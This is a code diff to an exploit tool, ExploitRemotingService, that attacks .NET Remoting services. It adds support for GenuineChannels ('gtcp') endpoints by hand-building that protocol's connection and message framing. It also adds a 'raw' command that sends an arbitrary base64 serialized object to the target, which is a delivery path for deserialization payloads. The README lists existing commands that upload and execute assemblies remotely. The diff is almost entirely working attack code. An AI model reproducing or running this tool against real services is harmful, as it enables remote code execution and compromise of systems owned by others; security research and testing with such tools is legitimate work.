This modification targets GenuineChannels extensions

ExploitRemotingService/Program.cs

@@ -77,6 +77,7 @@ static void SetupServer()
 
                 switch (_uri.Scheme)
                 {
+                    case "gtcp":
                     case "tcp":
                         {
                             dict["port"] = _port;
@@ -104,7 +105,7 @@ private static Stream BindStream()
         {
             Stream ret = null;
 
-            if (_uri.Scheme == "tcp")
+            if (_uri.Scheme == "tcp" || _uri.Scheme == "gtcp")
             {
                 TcpClient client = new TcpClient();
 
@@ -234,6 +235,7 @@ static void PrintHelp(OptionSet p)
 run  file [args]              : Upload and execute an assembly, calls entry point
 user                          : Print the current username
 ver                           : Print the OS version
+raw base64_object             : Send a raw serialized object to the service
 ");
         }
 
@@ -675,11 +677,89 @@ private static IRemoteClass CreateRemoteClass()
 
                 return GetExistingRemoteClass();
             }
-        }
-
-        static object SendRequest(object o, bool remote)
+        }
+
+        public static void WriteLabelledStream(MemoryStream inputStream, Stream outputStream)
+        {
+            MemoryStream stm = new MemoryStream();
+            BinaryWriter writer = new BinaryWriter(stm);
+
+            writer.Write((byte)0x37); // COMMAND_MAGIC_CODE
+            writer.Write((int)inputStream.Length);
+            writer.Write((byte)1); // Finished? 
+            writer.Write(inputStream.ToArray());
+
+            outputStream.Write(stm.ToArray(), 0, (int)stm.Length);
+            outputStream.Flush();
+        }
+
+        static object SendRequestGenuineChannel(byte[] data)
+        {
+            using (Stream netStream = BindStream())
+            {
+                MemoryStream stm = new MemoryStream();
+                BinaryWriter writer = new BinaryWriter(stm);
+
+                byte genuineConnectionType = 1;
+
+                //LowLevel_OpenConnection()
+                //  MessageCoder.SerializeConnectionHeader()
+                writer.Write((byte)3); // Protocol Version
+                writer.Write((byte)genuineConnectionType); 
+                writer.Write("$/__GC/" + _uri.Host); //ConnectionID / ConnectionName
+
+                WriteLabelledStream(stm, netStream);
+
+                stm = new MemoryStream();
+                writer = new BinaryWriter(stm);
+
+                //SendConnectionInfo
+                writer.Write(String.Format("{0}://{1}", _uri.Scheme, Guid.NewGuid())); // LocalUri
+                writer.Write((int) -1); // Undocumented
+                writer.Write(genuineConnectionType);
+                writer.Write((int)2); // LocalHostUniqueIdentifier
+
+                WriteLabelledStream(stm, netStream);
+
+                BinaryReader reader = new BinaryReader(netStream);
+                reader.ReadByte();
+                Int32 length = reader.ReadByte();
+                reader.ReadInt32();
+                String remoteUri = reader.ReadString();
+                Int32 remoteHostUniqueIdentifier = reader.ReadInt32();
+
+                //LowLevel_StartSending()
+                stm = new MemoryStream();
+                writer = new BinaryWriter(stm);
+
+                writer.Write("D"); // basicSecuritySession
+
+                //MessageCoder.Serialize()
+                writer.Write((byte)0); //Compression 
+                writer.Write((byte)1); //GenuineMessageType 1
+                writer.Write(2); // MessageID
+                writer.Write(0); // ReplyToId
+                writer.Write((bool)false); // Is OneWay
+                writer.Write((bool)false); // MarshalByRef
+                writer.Write((Int16)0); // SecuritySessionParameters.Attributes
+                writer.Write(String.Empty); // RemoteTransportUser
+
+                // Write ITransportHeaders
+                writer.Write("__RequestUri");
+                writer.Write(_uri.PathAndQuery);
+                writer.Write("Content-Type");
+                writer.Write("application/octet-stream");
+                writer.Write("__");                // headers end tag
+                writer.Write(data);
+
+                WriteLabelledStream(stm, netStream);
+            }
+
+            return null;
+        }
+
+        static object SendRequest(byte[] data)
         {
-            byte[] data = SerializeObject(o, remote);
             MemoryStream stm = new MemoryStream();
             BinaryWriter writer = new BinaryWriter(stm);
 
@@ -712,7 +792,32 @@ static object SendRequest(object o, bool remote)
 
                     return ParseResult(reader);
                 }
-            } 
+            }
+        }
+
+        static object SendRequest(string base64)
+        {
+            if (_uri.Scheme.Equals("gtcp"))
+            {
+                return SendRequestGenuineChannel(Convert.FromBase64String(base64));
+            }
+            else
+            {
+                return SendRequest(Convert.FromBase64String(base64));
+            }
+        }
+
+        static object SendRequest(object o, bool remote)
+        {
+            byte[] data = SerializeObject(o, remote);
+            if (_uri.Scheme.Equals("gtcp"))
+            {
+                return SendRequestGenuineChannel(data);
+            }
+            else
+            {
+                return SendRequest(data);
+            }
         }
 
         public static T MakeCall<T>(string path, MethodBase mi, params object[] cmdargs)
@@ -925,9 +1030,23 @@ static int Main(string[] args)
                         Console.WriteLine("Detected version {0} server", _ver);
                     }
 
-                    IRemoteClass ret = CreateRemoteClass();
+                    if (_cmd.Equals("raw"))
+                    {
+                        if (_cmdargs.Count != 1)
+                        {
+                            Console.Error.WriteLine("Must specify base64 encoded object");
+                        }
+                        else
+                        {
+                            Console.WriteLine(SendRequest(_cmdargs.First<string>()));
+                        }
+                    }
+                    else
+                    {
+                        IRemoteClass ret = CreateRemoteClass();
 
-                    ExecuteCommand(ret);
+                        ExecuteCommand(ret);
+                    }
                 }
                 catch (Exception ex)
                 {
@@ -939,7 +1058,7 @@ static int Main(string[] args)
             else
             {
                 return 1;
-            }            
-        }      
+            }
+        }
     }
 }

README.md

@@ -44,6 +44,7 @@ ls   remotedir                : List a remote directory
 run  file [args]              : Upload and execute an assembly, calls entry point
 user                          : Print the current username
 ver                           : Print the OS version
+raw base64_object             : Send a raw serialized object to the service
 </pre>
 
 This tool supports exploit both TCP remoting services and local IPC services. To test